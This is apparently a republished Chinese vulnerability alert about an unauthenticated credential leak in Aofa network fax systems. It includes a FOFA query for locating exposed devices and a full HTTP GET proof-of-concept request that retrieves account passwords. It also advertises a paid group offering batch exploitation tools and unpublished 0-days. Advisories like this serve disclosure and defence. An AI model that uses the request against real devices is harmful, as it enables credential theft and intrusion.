文章总结： 傲发网络传真系统user.ashx接口存在未授权信息泄露漏洞，攻击者可通过GET/handle/user.ashx?type=getuser直接获取账号密码等敏感信息，影响A802/A806等型号，已公开POC与Nuclei检测脚本，建议立即限制接口访问并升级补丁。 综合评分： 72 文章分类： 漏洞预警,WEB安全,安全工具

【漏洞预警】傲发网络传真系统 user.ashx 信息泄露

by 融云安全-cas

融云攻防实验室

2026年1月5日 15:16 江西

0x01 阅读须知

融云安全的技术文章仅供参考，此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等（包括但不限于）进行检测或维护参考，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他！！

0x02 漏洞描述

傲发办公通信产品以网络传真服务器为核心， 例如专业型A802和A806等型号，定位为办公实用型解决方案，主要面向配备专职网络管理人员的中大型企业用户。这些设备采用先进的网络传真技术，支持电子无纸化传真，帮助企业减少纸张消耗和运营成本，同时通过加密技术保障传真内容的安全性。

0x03 漏洞复现

fofa：body=”getincommingcall”

1.执行信息泄露poc，得到账户密码等信息

GET /handle/user.ashx?type=getuser HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Connection: keep-aliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Upgrade-Insecure-Requests: 1

2.nuclei图形化检测工具和poc已公布在星球

最后给兄弟们推荐下圈子，高质量漏洞利用研究，代码审计圈子，每周至少更新三个0Day/Nday及对应漏洞的批量利用工具，团队内部POC，源码分享，星球不定时更新内外网攻防渗透技巧以及最新学习，SRC研究报告等。

【圈子权益】

1，一年至少200+漏洞Poc及对应漏洞批量利用工具

2，各种漏洞利用工具及后续更新，渗透工具、文档资源分享

3，内部漏洞库情报分享（目前已有1000+poc，会每日更新，包括部分未公开0/1day）

圈子目前价格为59元，现在星球有1000+位师傅相信并选择加入我们

0x05 公司简介

江西渝融云安全科技有限公司，2017年发展至今，已成为了一家集云安全、物联网安全、数据安全、等保建设、风险评估、信息技术应用创新及网络安全人才培训为一体的本地化高科技公司，是江西省信息安全产业链企业和江西省政府部门重点行业网络安全事件应急响应队伍成员。    公司现已获得信息安全集成三级、信息系统安全运维三级、风险评估三级等多项资质认证，拥有软件著作权十八项；荣获2020年全国工控安全深度行安全攻防对抗赛三等奖；庆祝建党100周年活动信息安全应急保障优秀案例等荣誉……

广告：CNNVD二级和三级申请、续期私聊找我对话，价格便宜童叟无欺！

编制：sm

审核：fjh

审核：Dog

1个1朵5毛钱

天天搬砖的小M

能不能吃顿好的

就看你们的啦

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：融云攻防实验室 by 融云安全-cas《【漏洞预警】傲发网络传真系统 user.ashx 信息泄露》